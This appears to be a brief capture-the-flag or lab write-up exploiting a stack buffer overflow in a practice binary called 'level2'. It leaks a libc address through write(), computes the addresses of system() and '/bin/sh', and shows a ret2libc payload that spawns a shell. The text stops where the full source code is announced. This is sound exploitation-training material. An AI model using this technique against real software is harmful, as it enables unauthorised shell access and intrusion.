- ida pro
gcc -fno-stack-protector -o level2 level2.c
echo 2 > /proc/sys/kernel/randomize_va_space
The app can read 256 bytes into the buf but buf only has 128 bytes space. Stack overflow
- Because of the DEP, we can’t execute our shellcode which locates on the stack.
- Because of the ASLR, we can’t use a static libc address to find or call system()
- We need to know the padding between buf and return address.
- The app called write() in main() so we can use it to leak the libc address.
- When we get the absolutely address of write(), we can get the libc base address too
- libc_base_address = write_address - write_offset
- Use libc_base_address get the address of system() and /bin/sh
- system() = write_address - (write_offset - system_offset)
- /bin/sh = write_address - (write_offset - /bin/sh_offset)
- Run the app again and generate an legal shellcode to pwn it.
1、The first step: get padding between buf and return address:
gdb -q level2
Generate 300 random alphas with pwndbg which in gdb:
Then input r to run
Paste 300 bytes and the app will crash on 0x6261616b.Use cyclic to get the padding.
cyclic -l 0x6261616b
So the padding is 140 bytes.
Now we should generate shellcode to call write() so that we can system() address and /bin/sh address.
libc = ELF('libc.so')
After this, we can generate shellcode to pwn:
payload2 = 'a'*140 + p32(system_addr) + p32(0) + p32(binsh_addr)
Here’s the full source code: